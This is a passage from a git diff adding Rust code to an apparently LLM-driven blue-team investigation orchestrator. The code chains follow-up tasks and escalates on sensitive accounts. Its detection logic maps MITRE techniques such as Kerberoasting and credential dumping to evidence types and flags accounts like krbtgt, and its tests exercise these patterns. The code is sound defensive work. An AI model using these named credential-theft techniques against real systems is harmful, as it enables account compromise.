+                if CRITICAL_USERS.contains(trimmed) {
+                    return Some(format!("Critical user detected: {name}"));
+                }
+            }
+        }
+    }
+
+    // Check evidence_highlights for critical user mentions.
+    if let Some(highlights) = payload
+        .get("evidence_highlights")
+        .and_then(|v| v.as_array())
+    {
+        for highlight in highlights {
+            if let Some(text) = highlight.as_str() {
+                let lower = text.to_lowercase();
+                for &critical in CRITICAL_USERS.iter() {
+                    if lower.contains(critical) {
+                        return Some(format!("Critical user '{critical}' mentioned in evidence"));
+                    }
+                }
+            }
+        }
+    }
+
+    // Check for high-severity indicators in the result.
+    if let Some(severity) = payload.get("severity").and_then(|v| v.as_str()) {
+        let sev_lower = severity.to_lowercase();
+        if sev_lower == "critical" || sev_lower == "high" {
+            return Some(format!("High severity result: {severity}"));
+        }
+    }
+
+    // Check findings text for critical user mentions.
+    if let Some(findings) = payload.get("findings").and_then(|v| v.as_str()) {
+        let lower = findings.to_lowercase();
+        for &critical in CRITICAL_USERS.iter() {
+            if lower.contains(critical) {
+                return Some(format!("Critical user '{critical}' mentioned in findings"));
+            }
+        }
+    }
+
+    None
+}
+
+// ── Internals ───────────────────────────────────────────────────────
+
+/// Extract evidence type strings from a result payload.
+///
+/// Looks for:
+/// - `evidence_types`: `["suspicious_ip", ...]`
+/// - `evidence`: `[{ "type": "suspicious_ip", ... }, ...]`
+/// - `techniques_found`: maps MITRE technique IDs to evidence types
+fn extract_evidence_types(payload: &Value) -> Vec<String> {
+    let mut types = Vec::new();
+
+    // Direct evidence_types array
+    if let Some(arr) = payload.get("evidence_types").and_then(|v| v.as_array()) {
+        for item in arr {
+            if let Some(s) = item.as_str() {
+                types.push(s.to_lowercase());
+            }
+        }
+    }
+
+    // Evidence objects with a "type" field
+    if let Some(arr) = payload.get("evidence").and_then(|v| v.as_array()) {
+        for item in arr {
+            if let Some(ev_type) = item.get("type").and_then(|v| v.as_str()) {
+                types.push(ev_type.to_lowercase());
+            }
+        }
+    }
+
+    // MITRE technique mapping (mirrors Python _process_result_chains)
+    if let Some(arr) = payload.get("techniques_found").and_then(|v| v.as_array()) {
+        for tech in arr {
+            if let Some(tech_str) = tech.as_str() {
+                let lower = tech_str.to_lowercase();
+                if lower.contains("t1558") {
+                    // Kerberoasting -> credential_access
+                    types.push("credential_access".to_string());
+                } else if lower.contains("t1003") {
+                    // OS Credential Dumping -> credential_access
+                    types.push("credential_access".to_string());
+                } else if lower.contains("t1550") {
+                    // Use Alternate Authentication Material -> lateral_movement
+                    types.push("lateral_movement".to_string());
+                } else if lower.contains("t1021") {
+                    // Remote Services -> lateral_movement
+                    types.push("lateral_movement".to_string());
+                } else if lower.contains("t1053") || lower.contains("t1547") {
+                    // Scheduled Task / Boot Autostart -> persistence_mechanism
+                    types.push("persistence_mechanism".to_string());
+                } else if lower.contains("t1071") || lower.contains("t1105") {
+                    // Application Layer Protocol / Ingress Tool Transfer -> c2
+                    types.push("c2_communication".to_string());
+                } else if lower.contains("t1068") || lower.contains("t1134") {
+                    // Exploitation for Privilege Escalation / Access Token Manipulation
+                    types.push("privilege_escalation".to_string());
+                }
+            }
+        }
+    }
+
+    // Dedup while preserving order
+    let mut seen = HashSet::new();
+    types.retain(|t| seen.insert(t.clone()));
+
+    types
+}
+/// Dispatch a single chained follow-up task to the blue task queue.
+async fn dispatch_chain_task(
+    task_queue: &mut BlueTaskQueue,
+    investigation_id: &str,
+    action: &ChainAction,
+    evidence_type: &str,
+) -> Result<String> {
+    let task_id = format!(
+        "chain_{}_{}_{}_{}",
+        action.task_type,
+        evidence_type,
+        &investigation_id.chars().take(8).collect::<String>(),
+        &uuid::Uuid::new_v4().simple().to_string()[..8]
+    );
+
+    let params = serde_json::json!({
+        "chained_from_evidence": evidence_type,
+        "focus": action.focus,
+        "auto_chained": true,
+    });
+
+    let task = BlueTaskMessage {
+        task_id: task_id.clone(),
+        investigation_id: investigation_id.to_string(),
+        task_type: action.task_type.to_string(),
+        role: action.role.as_str().to_string(),
+        params,
+        created_at: Utc::now().to_rfc3339(),
+    };
+
+    task_queue.submit_task(&task).await?;
+
+    info!(
+        task_id = %task_id,
+        task_type = action.task_type,
+        evidence_type,
+        focus = action.focus,
+        investigation_id,
+        "Dispatched chained follow-up task"
+    );
+
+    Ok(task_id)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+
+    #[test]
+    fn test_extract_evidence_types_from_evidence_types_array() {
+        let payload = json!({
+            "evidence_types": ["suspicious_ip", "lateral_movement"]
+        });
+        let types = extract_evidence_types(&payload);
+        assert_eq!(types, vec!["suspicious_ip", "lateral_movement"]);
+    }
+
+    #[test]
+    fn test_extract_evidence_types_from_evidence_objects() {
+        let payload = json!({
+            "evidence": [
+                { "type": "Credential_Access", "value": "hash123" },
+                { "type": "c2_communication", "value": "beacon" }
+            ]
+        });
+        let types = extract_evidence_types(&payload);
+        assert_eq!(types, vec!["credential_access", "c2_communication"]);
+    }
+
+    #[test]
+    fn test_extract_evidence_types_from_techniques() {
+        let payload = json!({
+            "techniques_found": ["T1558.003", "T1021.002"]
+        });
+        let types = extract_evidence_types(&payload);
+        assert_eq!(types, vec!["credential_access", "lateral_movement"]);
+    }
+
+    #[test]
+    fn test_extract_evidence_types_dedup() {
+        let payload = json!({
+            "evidence_types": ["lateral_movement"],
+            "techniques_found": ["T1550.002"]
+        });
+        let types = extract_evidence_types(&payload);
+        // "lateral_movement" appears from both sources but should only be listed once
+        assert_eq!(types, vec!["lateral_movement"]);
+    }
+
+    #[test]
+    fn test_should_escalate_critical_user_in_users_investigated() {
+        let result = BlueTaskResult {
+            task_id: "t1".into(),
+            investigation_id: "inv1".into(),
+            success: true,
+            result: Some(json!({
+                "users_investigated": ["krbtgt", "normaluser"]
+            })),
+            error: None,
+            completed_at: "2026-04-08T00:00:00Z".into(),
+            worker_agent: Some("hunter1".into()),
+        };
+        let reason = should_escalate(&result);
+        assert!(reason.is_some());
+        assert!(reason.unwrap().contains("krbtgt"));
+    }
+
+    #[test]
+    fn test_should_escalate_critical_user_in_highlights() {
+        let result = BlueTaskResult {
+            task_id: "t2".into(),
+            investigation_id: "inv1".into(),
+            success: true,
+            result: Some(json!({
+                "evidence_highlights": ["Found Administrator logon from unusual host"]
+            })),
+            error: None,
+            completed_at: "2026-04-08T00:00:00Z".into(),
+            worker_agent: Some("hunter1".into()),
+        };
+        let reason = should_escalate(&result);
+        assert!(reason.is_some());
+        assert!(reason.unwrap().contains("administrator"));
+    }
completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + let reason = should_escalate(&result); + assert!(reason.is_some()); + assert!(reason.unwrap().contains("critical")); + } + + #[test] + fn test_should_escalate_schema_admins() { + let result = BlueTaskResult { + task_id: "t4".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "users_investigated": ["Schema Admins"] + })), + error: None, + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + let reason = should_escalate(&result); + assert!(reason.is_some()); + assert!(reason.unwrap().contains("Schema Admins")); + } + + #[test] + fn test_should_not_escalate_normal_result() { + let result = BlueTaskResult { + task_id: "t5".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "users_investigated": ["svc_backup", "jsmith"], + "severity": "low" + })), + error: None, + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + assert!(should_escalate(&result).is_none()); + } + + #[test] + fn test_should_not_escalate_failed_result() { + let result = BlueTaskResult { + task_id: "t6".into(), + investigation_id: "inv1".into(), + success: false, + result: None, + error: Some("timeout".into()), + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + assert!(should_escalate(&result).is_none()); + } + + #[test] + fn test_should_escalate_findings_mention() { + let result = BlueTaskResult { + task_id: "t7".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "findings": "Enterprise Admins group membership was modified" + })), + error: None, + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + let reason = should_escalate(&result); + assert!(reason.is_some()); + assert!(reason.unwrap().contains("enterprise admins")); + } + + #[test] + fn test_chain_map_coverage() { + // Verify all expected evidence types are present in the map + let expected = [ + "suspicious_ip", + "malicious_process", + "lateral_movement", + "credential_access", + "persistence_mechanism", + "c2_communication", + "privilege_escalation", + ]; + for ev_type in &expected { + assert!( + EVIDENCE_CHAIN_MAP.contains_key(ev_type), + "Missing evidence type in chain map: {ev_type}" + ); + } + } + + #[test] + fn test_privilege_escalation_dispatches_two_actions() { + let actions = EVIDENCE_CHAIN_MAP.get("privilege_escalation").unwrap(); + assert_eq!(actions.len(), 2); + let task_types: Vec<&str> = actions.iter().map(|a| a.task_type).collect(); + assert!(task_types.contains(&"lateral_analysis")); + assert!(task_types.contains(&"threat_hunt")); + } + + #[test] + fn test_critical_users_set() { + assert!(CRITICAL_USERS.contains("krbtgt")); + assert!(CRITICAL_USERS.contains("administrator")); + assert!(CRITICAL_USERS.contains("domain admins")); + assert!(CRITICAL_USERS.contains("enterprise admins")); + assert!(CRITICAL_USERS.contains("schema admins")); + assert!(!CRITICAL_USERS.contains("normaluser")); + } +} diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs new file mode 100644 index 00000000..a0b566a1 --- /dev/null +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -0,0 +1,570 @@ +//! Investigation lifecycle management. +//! +//! Handles creating investigations, dispatching tasks to workers, +//! 
diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs
new file mode 100644
index 00000000..a0b566a1
--- /dev/null
+++ b/ares-cli/src/orchestrator/blue/investigation.rs
@@ -0,0 +1,570 @@
+//! Investigation lifecycle management.
+//!
+//! Handles creating investigations, dispatching tasks to workers,
+//! processing results, and driving the investigation to completion.
+
+use std::collections::HashSet;
+use std::sync::Arc;
+
+use anyhow::{Context, Result};
+use chrono::Utc;
+use tracing::{info, warn};
+
+use ares_core::eval::workflow::evaluate_live_investigation;
+use ares_core::state::blue_task_queue::{BlueTaskQueue, BlueTaskResult};
+use ares_core::state::{BlueStateReader, BlueStateWriter, RedisStateReader};
+use ares_llm::tool_registry::blue::BlueAgentRole;
+use ares_llm::{
+    run_agent_loop, AgentLoopConfig, AgentLoopOutcome, LlmProvider, LoopEndReason, ToolDispatcher,
+};
+
+use super::callbacks::BlueCallbackHandler;
+use super::chaining;
+
+/// Represents a running investigation.
+pub struct Investigation {
+    pub investigation_id: String,
+    pub alert: serde_json::Value,
+    pub model: String,
+    /// Red team operation ID for post-investigation scoring against ground truth.
+    pub operation_id: Option<String>,
+    /// Custom report output directory. Falls back to `ARES_REPORT_DIR` env var,
+    /// then `~/.ares/reports/`.
+    pub report_dir: Option<String>,
+    pub state_writer: BlueStateWriter,
+}
+
+impl Investigation {
+    pub fn new(
+        investigation_id: String,
+        alert: serde_json::Value,
+        model: String,
+        operation_id: Option<String>,
+        report_dir: Option<String>,
+    ) -> Self {
+        let state_writer = BlueStateWriter::new(investigation_id.clone());
+        Self {
+            investigation_id,
+            alert,
+            model,
+            operation_id,
+            report_dir,
+            state_writer,
+        }
+    }
+}
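Editor's note: `run_investigation` (below) reads a JSON map from `ares:blue:inv:{id}:env_vars` and injects each pair into the process environment before the agent loop starts. The producer side is not shown in this patch; a hypothetical sketch of seeding that key, assuming the same key layout and the `redis`/`serde_json` crates the patch already uses:

```rust
use redis::AsyncCommands;

// Hypothetical producer — key name mirrors what run_investigation() reads;
// the concrete values are placeholders.
#[tokio::main]
async fn main() -> anyhow::Result<()> {
    let client = redis::Client::open("redis://127.0.0.1/")?;
    let mut conn = client.get_connection_manager().await?;

    let env_map = serde_json::json!({
        "GRAFANA_URL": "http://grafana.local:3000",
        "GRAFANA_SERVICE_ACCOUNT_TOKEN": "glsa_example_token",
    });

    let key = "ares:blue:inv:inv-1234:env_vars";
    // Expire alongside the investigation so stale tokens don't linger.
    conn.set_ex::<_, _, ()>(key, env_map.to_string(), 86_400).await?;
    Ok(())
}
```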
+/// Run a complete investigation workflow driven by the orchestrator LLM.
+///
+/// The orchestrator agent coordinates triage, threat hunting, and lateral
+/// analysis by calling `dispatch_task` and processing results.
+pub async fn run_investigation(
+    investigation: &Investigation,
+    provider: Arc<dyn LlmProvider>,
+    dispatcher: Arc<dyn ToolDispatcher>,
+    _task_queue: &mut BlueTaskQueue,
+    redis_url: &str,
+    conn: &mut redis::aio::ConnectionManager,
+) -> Result<InvestigationOutcome> {
+    info!(
+        investigation_id = %investigation.investigation_id,
+        "Starting blue team investigation"
+    );
+
+    // Load investigation env vars from Redis and inject into process environment.
+    // These are set by `ares blue from-operation` and include GRAFANA_URL,
+    // GRAFANA_SERVICE_ACCOUNT_TOKEN, etc. needed by blue tools (e.g. Loki queries
+    // routed through Grafana's datasource proxy).
+    let env_key = format!("ares:blue:inv:{}:env_vars", investigation.investigation_id);
+    if let Ok(env_json) = redis::AsyncCommands::get::<_, String>(conn, &env_key).await {
+        if let Ok(env_map) =
+            serde_json::from_str::<std::collections::HashMap<String, String>>(&env_json)
+        {
+            for (key, value) in &env_map {
+                // Only set if not already present — don't clobber orchestrator's own env
+                if std::env::var(key).is_err() {
+                    std::env::set_var(key, value);
+                }
+            }
+            info!(
+                investigation_id = %investigation.investigation_id,
+                count = env_map.len(),
+                "Injected investigation env vars"
+            );
+        }
+    }
+
+    investigation
+        .state_writer
+        .initialize(conn, &investigation.alert)
+        .await
+        .context("Failed to initialize investigation state")?;
+
+    // Acquire investigation lock (TTL 1 hour)
+    if let Ok(true) = investigation.state_writer.acquire_lock(conn, 3600).await {
+        info!(
+            investigation_id = %investigation.investigation_id,
+            "Acquired investigation lock"
+        );
+    }
+
+    investigation
+        .state_writer
+        .set_status(conn, "in_progress", None)
+        .await
+        .ok();
+
+    // Build the orchestrator system prompt
+    let role = BlueAgentRole::Orchestrator;
+    let tools = ares_llm::tool_registry::blue::blue_tools_for_role(role);
+    let capabilities: Vec<String> = tools
+        .iter()
+        .filter(|t| !ares_llm::tool_registry::blue::is_blue_callback_tool(&t.name))
+        .map(|t| t.name.clone())
+        .collect();
+
+    let system_prompt =
+        ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities)
+            .context("Failed to build blue orchestrator system prompt")?;
+
+    // Build the task prompt with alert context using the initial alert prompt template
+    let task_prompt = ares_llm::prompt::blue::build_initial_alert_prompt(
+        &investigation.investigation_id,
+        &investigation.alert,
+        investigation.operation_id.as_deref(),
+    )
+    .context("Failed to build initial alert prompt")?;
+
+    let config = AgentLoopConfig {
+        model: investigation.model.clone(),
+        max_steps: 75,
+        max_tool_calls_per_name: 25,
+        ..AgentLoopConfig::default()
+    };
+
+    // Wire blue callback handler for dispatch + query + lifecycle tools
+    let callback_handler = Arc::new(BlueCallbackHandler::new(
+        Arc::clone(&provider),
+        Arc::clone(&dispatcher),
+        investigation.model.clone(),
+        investigation.investigation_id.clone(),
+        investigation.alert.clone(),
+        redis_url.to_string(),
+    ));
+
+    // Run the orchestrator agent loop
+    let outcome = run_agent_loop(
+        provider.as_ref(),
+        dispatcher,
+        &config,
+        &system_prompt,
+        &task_prompt,
+        role.as_str(),
+        &investigation.investigation_id,
+        &tools,
+        Some(callback_handler),
+    )
+    .await;
+
+    let investigation_outcome = process_outcome(&outcome, &investigation.investigation_id);
+    // Auto-chain follow-up tasks based on discoveries from the agent loop.
+    let mut dispatched_chains: HashSet<String> = HashSet::new();
+    let mut chained_task_ids: Vec<String> = Vec::new();
+
+    for discovery in &outcome.discoveries {
+        let synthetic_result = BlueTaskResult {
+            task_id: format!("discovery_{}", investigation.investigation_id),
+            investigation_id: investigation.investigation_id.clone(),
+            success: true,
+            result: Some(discovery.clone()),
+            error: None,
+            completed_at: Utc::now().to_rfc3339(),
+            worker_agent: Some("orchestrator".into()),
+        };
+
+        match chaining::process_task_result(
+            &synthetic_result,
+            _task_queue,
+            &investigation.investigation_id,
+            &mut dispatched_chains,
+        )
+        .await
+        {
+            Ok(new_ids) => chained_task_ids.extend(new_ids),
+            Err(e) => {
+                warn!(
+                    investigation_id = %investigation.investigation_id,
+                    error = %e,
+                    "Failed to process evidence chain"
+                );
+            }
+        }
+    }
+
+    if !chained_task_ids.is_empty() {
+        info!(
+            investigation_id = %investigation.investigation_id,
+            count = chained_task_ids.len(),
+            "Evidence auto-chaining dispatched follow-up tasks"
+        );
+    }
+
+    // Score investigation against red team ground truth
+    if let Some(op_id) = &investigation.operation_id {
+        score_against_ground_truth(
+            conn,
+            &investigation.investigation_id,
+            op_id,
+            &investigation.model,
+            &outcome,
+        )
+        .await;
+    }
+
+    // Update investigation status
+    let final_status = match &investigation_outcome {
+        InvestigationOutcome::Completed { verdict, .. } => {
+            info!(
+                investigation_id = %investigation.investigation_id,
+                verdict = %verdict,
+                steps = outcome.steps,
+                "Investigation completed"
+            );
+            "completed"
+        }
+        InvestigationOutcome::Escalated { reason, .. } => {
+            warn!(
+                investigation_id = %investigation.investigation_id,
+                reason = %reason,
+                "Investigation escalated"
+            );
+            "escalated"
+        }
+        InvestigationOutcome::Failed { error } => {
+            warn!(
+                investigation_id = %investigation.investigation_id,
+                error = %error,
+                "Investigation failed"
+            );
+            "failed"
+        }
+    };
+
+    let error_msg = match &investigation_outcome {
+        InvestigationOutcome::Failed { error } => Some(error.as_str()),
+        _ => None,
+    };
+    investigation
+        .state_writer
+        .set_status(conn, final_status, error_msg)
+        .await
+        .ok();
+
+    // Release investigation lock
+    investigation.state_writer.release_lock(conn).await.ok();
+
+    // Auto-generate investigation report
+    generate_report(
+        conn,
+        &investigation.investigation_id,
+        investigation.report_dir.as_deref(),
+    )
+    .await;
+
+    Ok(investigation_outcome)
+}
+
+/// Resolve the report output directory.
+///
+/// Priority: explicit `report_dir` > `ARES_REPORT_DIR` env var > `~/.ares/reports/`.
+fn resolve_report_dir(report_dir: Option<&str>) -> std::path::PathBuf {
+    if let Some(dir) = report_dir {
+        return std::path::PathBuf::from(dir);
+    }
+    if let Ok(dir) = std::env::var("ARES_REPORT_DIR") {
+        return std::path::PathBuf::from(dir);
+    }
+    let home = std::env::var("HOME").unwrap_or_else(|_| ".".to_string());
+    std::path::PathBuf::from(home).join(".ares").join("reports")
+}
+/// Generate a markdown investigation report and write it to disk.
+///
+/// Best-effort: logs warnings on failure rather than propagating errors.
+pub(super) async fn generate_report(
+    conn: &mut redis::aio::ConnectionManager,
+    investigation_id: &str,
+    report_dir: Option<&str>,
+) {
+    let reader = BlueStateReader::new(investigation_id.to_string());
+    let state = match reader.load_state(conn).await {
+        Ok(Some(s)) => s,
+        Ok(None) => {
+            warn!(
+                investigation_id = investigation_id,
+                "Skipping report: investigation state not found"
+            );
+            return;
+        }
+        Err(e) => {
+            warn!(
+                investigation_id = investigation_id,
+                error = %e,
+                "Skipping report: failed to load state"
+            );
+            return;
+        }
+    };
+
+    let generator = match ares_core::reports::BlueTeamReportGenerator::new() {
+        Ok(g) => g,
+        Err(e) => {
+            warn!(error = %e, "Skipping report: failed to create report generator");
+            return;
+        }
+    };
+
+    let report = match generator.generate_investigation(&state, &[]) {
+        Ok(r) => r,
+        Err(e) => {
+            warn!(
+                investigation_id = investigation_id,
+                error = %e,
+                "Failed to generate investigation report"
+            );
+            return;
+        }
+    };
+
+    let reports_dir = resolve_report_dir(report_dir);
+
+    if let Err(e) = std::fs::create_dir_all(&reports_dir) {
+        warn!(
+            error = %e,
+            "Failed to create reports directory"
+        );
+        return;
+    }
+
+    let report_path = reports_dir.join(format!("{investigation_id}_report.md"));
+    match std::fs::write(&report_path, &report) {
+        Ok(()) => {
+            info!(
+                investigation_id = investigation_id,
+                path = %report_path.display(),
+                "Investigation report written"
+            );
+        }
+        Err(e) => {
+            warn!(
+                investigation_id = investigation_id,
+                error = %e,
+                "Failed to write investigation report"
+            );
+        }
+    }
+}
+
+/// Outcome of a completed investigation.
+#[derive(Debug)]
+#[allow(dead_code)]
+pub enum InvestigationOutcome {
+    Completed {
+        verdict: String,
+        summary: String,
+        steps: u32,
+    },
+    Escalated {
+        reason: String,
+        severity: String,
+    },
+    Failed {
+        error: String,
+    },
+}
+
+fn process_outcome(outcome: &AgentLoopOutcome, investigation_id: &str) -> InvestigationOutcome {
+    match &outcome.reason {
+        LoopEndReason::TaskComplete { result, .. } => InvestigationOutcome::Completed {
+            verdict: extract_verdict(result),
+            summary: result.clone(),
+            steps: outcome.steps,
+        },
+        LoopEndReason::RequestAssistance { issue, .. } => InvestigationOutcome::Escalated {
+            reason: issue.clone(),
+            severity: if issue.to_lowercase().contains("critical") {
+                "critical".into()
+            } else {
+                "high".into()
+            },
+        },
+        LoopEndReason::EndTurn { content } => InvestigationOutcome::Completed {
+            verdict: extract_verdict(content),
+            summary: content.clone(),
+            steps: outcome.steps,
+        },
+        LoopEndReason::MaxSteps => InvestigationOutcome::Failed {
+            error: format!(
+                "Investigation {investigation_id} hit max steps ({})",
+                outcome.steps
+            ),
+        },
+        LoopEndReason::MaxTokens => InvestigationOutcome::Failed {
+            error: format!("Investigation {investigation_id} hit max tokens"),
+        },
+        LoopEndReason::Error(err) => InvestigationOutcome::Failed { error: err.clone() },
+    }
+}
+
+/// Extract a verdict from the investigation result text.
+fn extract_verdict(text: &str) -> String {
+    let lower = text.to_lowercase();
+    if lower.contains("true positive") {
+        "true_positive".into()
+    } else if lower.contains("false positive") {
+        "false_positive".into()
+    } else if lower.contains("benign") {
+        "benign".into()
+    } else if lower.contains("malicious") || lower.contains("confirmed threat") {
+        "true_positive".into()
+    } else {
+        "inconclusive".into()
+    }
+}
+/// Score a completed investigation against red team ground truth.
+///
+/// Loads the blue team investigation state and the red team operation state
+/// from Redis, then runs all six scorers to produce a grade and gap analysis.
+async fn score_against_ground_truth(
+    conn: &mut redis::aio::ConnectionManager,
+    investigation_id: &str,
+    operation_id: &str,
+    model: &str,
+    outcome: &AgentLoopOutcome,
+) {
+    let blue_reader = BlueStateReader::new(investigation_id.to_string());
+    let blue_state = match blue_reader.load_state(conn).await {
+        Ok(Some(state)) => state,
+        Ok(None) => {
+            warn!(
+                investigation_id = investigation_id,
+                "Skipping evaluation: blue team state not found in Redis"
+            );
+            return;
+        }
+        Err(e) => {
+            warn!(
+                investigation_id = investigation_id,
+                error = %e,
+                "Skipping evaluation: failed to load blue team state"
+            );
+            return;
+        }
+    };
+
+    let red_reader = RedisStateReader::new(operation_id.to_string());
+    let red_state = match red_reader.load_state(conn).await {
+        Ok(Some(state)) => state,
+        Ok(None) => {
+            warn!(
+                operation_id = operation_id,
+                "Skipping evaluation: red team state not found in Redis"
+            );
+            return;
+        }
+        Err(e) => {
+            warn!(
+                operation_id = operation_id,
+                error = %e,
+                "Skipping evaluation: failed to load red team state"
+            );
+            return;
+        }
+    };
+
+    // Estimate duration from outcome step count (rough heuristic: ~10s per step)
+    let duration_seconds = outcome.steps as f64 * 10.0;
+
+    let eval_output = evaluate_live_investigation(&blue_state, &red_state, model, duration_seconds);
+
+    info!(
+        investigation_id = investigation_id,
+        operation_id = operation_id,
+        grade = eval_output.result.grade(),
+        overall_score = format!("{:.2}", eval_output.result.overall_score),
+        ioc_detection = format!("{:.2}", eval_output.result.ioc_detection_rate),
+        technique_coverage = format!("{:.2}", eval_output.result.technique_coverage),
+        evidence_count = eval_output.result.evidence_count,
+        "Investigation evaluation complete"
+    );
+
+    if !eval_output.gap_analysis.detection_gaps.is_empty() {
+        info!(
+            investigation_id = investigation_id,
+            gaps = eval_output.gap_analysis.detection_gaps.len(),
+            "Detection gaps identified — see gap analysis for recommendations"
+        );
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn test_extract_verdict() {
+        assert_eq!(extract_verdict("This is a true positive"), "true_positive");
+        assert_eq!(
+            extract_verdict("Determined to be a false positive"),
+            "false_positive"
+        );
+        assert_eq!(extract_verdict("Activity is benign"), "benign");
+        assert_eq!(extract_verdict("Confirmed threat"), "true_positive");
+        assert_eq!(extract_verdict("Needs more data"), "inconclusive");
+    }
+
+    #[test]
+    fn test_process_outcome_completed() {
+        let outcome = AgentLoopOutcome {
+            reason: LoopEndReason::TaskComplete {
+                task_id: "inv1".into(),
+                result: "True positive: lateral movement confirmed".into(),
+            },
+            total_usage: Default::default(),
+            steps: 10,
+            tool_calls_dispatched: 5,
+            discoveries: Vec::new(),
+            tool_outputs: Vec::new(),
+        };
+        match process_outcome(&outcome, "inv1") {
+            InvestigationOutcome::Completed { verdict, steps, .. } => {
+                assert_eq!(verdict, "true_positive");
+                assert_eq!(steps, 10);
+            }
+            other => panic!("Expected Completed, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn test_process_outcome_escalated() {
+        let outcome = AgentLoopOutcome {
+            reason: LoopEndReason::RequestAssistance {
+                issue: "Critical: active data exfiltration".into(),
+                context: "".into(),
+            },
+            total_usage: Default::default(),
+            steps: 3,
+            tool_calls_dispatched: 1,
+            discoveries: Vec::new(),
+            tool_outputs: Vec::new(),
+        };
+        match process_outcome(&outcome, "inv1") {
+            InvestigationOutcome::Escalated { severity, .. } => {
+                assert_eq!(severity, "critical");
+            }
+            other => panic!("Expected Escalated, got {other:?}"),
+        }
+    }
+}
diff --git a/ares-cli/src/orchestrator/blue/mod.rs b/ares-cli/src/orchestrator/blue/mod.rs
new file mode 100644
index 00000000..391bceb8
--- /dev/null
+++ b/ares-cli/src/orchestrator/blue/mod.rs
@@ -0,0 +1,19 @@
+//! Blue team investigation orchestrator.
+//!
+//! Consumes investigation requests from `ares:blue:investigations`,
+//! dispatches tasks to specialized agents (triage, threat_hunter,
+//! lateral_analyst, escalation_triage) via the blue task queue,
+//! and processes results.
+//!
+//! Parallels the red team orchestrator but drives SOC investigation
+//! workflows instead of attack chains.
+
+pub mod auto_submit;
+mod callbacks;
+pub mod chaining;
+mod investigation;
+mod runner;
+mod sub_agent;
+
+pub use auto_submit::spawn_blue_auto_submit;
+pub use runner::spawn_blue_orchestrator;
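Editor's note: the runner below marks an investigation stale by parsing the JSON it stores at `ares:blue:inv:{id}:status` and comparing `started_at` against a 900-second threshold. A self-contained sketch of that check, mirroring the JSON shape and the "missing timestamp counts as stale" rule the patch uses (the function name is illustrative):

```rust
use chrono::{DateTime, Utc};

/// Returns true when a status blob describes an in-progress investigation
/// whose started_at is older than threshold_secs (or absent entirely).
fn is_stale(status_json: &str, now: DateTime<Utc>, threshold_secs: i64) -> bool {
    let Ok(status) = serde_json::from_str::<serde_json::Value>(status_json) else {
        return false; // unparseable blobs are skipped, as in the patch
    };
    if status.get("status").and_then(|v| v.as_str()) != Some("in_progress") {
        return false;
    }
    match status
        .get("started_at")
        .and_then(|v| v.as_str())
        .and_then(|s| DateTime::parse_from_rfc3339(s).ok())
    {
        Some(started) => (now - started.with_timezone(&Utc)).num_seconds() > threshold_secs,
        None => true, // no timestamp = assume stale
    }
}

fn main() {
    let now = Utc::now();
    let fresh = format!(
        r#"{{"status":"in_progress","started_at":"{}"}}"#,
        now.to_rfc3339()
    );
    assert!(!is_stale(&fresh, now, 900));
    assert!(is_stale(r#"{"status":"in_progress"}"#, now, 900));
}
```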
diff --git a/ares-cli/src/orchestrator/blue/runner.rs b/ares-cli/src/orchestrator/blue/runner.rs
new file mode 100644
index 00000000..47f1763a
--- /dev/null
+++ b/ares-cli/src/orchestrator/blue/runner.rs
@@ -0,0 +1,401 @@
+//! Blue team orchestrator service loop.
+//!
+//! Polls `ares:blue:investigations` for new investigation requests and
+//! drives each through the investigation workflow using the LLM agent loop.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use anyhow::{Context, Result};
+use redis::AsyncCommands;
+use tokio::sync::watch;
+use tracing::{error, info, warn};
+
+use ares_core::state::blue_task_queue::BlueTaskQueue;
+use ares_llm::{LlmProvider, ToolDispatcher};
+
+use super::investigation::{self, Investigation};
+
+/// Timeout for a single investigation run (15 minutes).
+const INVESTIGATION_TIMEOUT_SECS: u64 = 900;
+
+/// Threshold for considering a running investigation as stale (15 minutes).
+const STALE_INVESTIGATION_THRESHOLD_SECS: i64 = 900;
+
+/// Interval between periodic stale investigation checks (5 minutes).
+const STALE_CHECK_INTERVAL_SECS: u64 = 300;
+
+/// Blue team investigation orchestrator.
+///
+/// Owns the LLM provider and tool dispatcher, and drives investigations
+/// from alert to completion.
+pub struct BlueOrchestrator {
+    provider: Arc<dyn LlmProvider>,
+    model_name: String,
+    dispatcher: Arc<dyn ToolDispatcher>,
+    redis_url: String,
+}
+
+impl BlueOrchestrator {
+    pub fn new(
+        provider: Box<dyn LlmProvider>,
+        model_name: String,
+        dispatcher: Arc<dyn ToolDispatcher>,
+        redis_url: String,
+    ) -> Self {
+        Self {
+            provider: Arc::from(provider),
+            model_name,
+            dispatcher,
+            redis_url,
+        }
+    }
+
+    /// Clean up stale investigations left in "running" status.
+    ///
+    /// Scans `ares:blue:active_investigations` for investigation IDs whose
+    /// status has been `in_progress` for longer than the threshold. Marks
+    /// them as `failed` with an orphaned message and removes from the active set.
+    async fn cleanup_stale_investigations(&self) {
+        let mut conn = match redis::Client::open(self.redis_url.as_str()) {
+            Ok(client) => match client.get_connection_manager().await {
+                Ok(c) => c,
+                Err(e) => {
+                    warn!("Stale cleanup: failed to connect to Redis: {e}");
+                    return;
+                }
+            },
+            Err(e) => {
+                warn!("Stale cleanup: failed to open Redis client: {e}");
+                return;
+            }
+        };
+
+        // Get all active investigation IDs
+        let active_ids: Vec<String> = match conn
+            .smembers::<_, Vec<String>>(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS)
+            .await
+        {
+            Ok(ids) => ids,
+            Err(e) => {
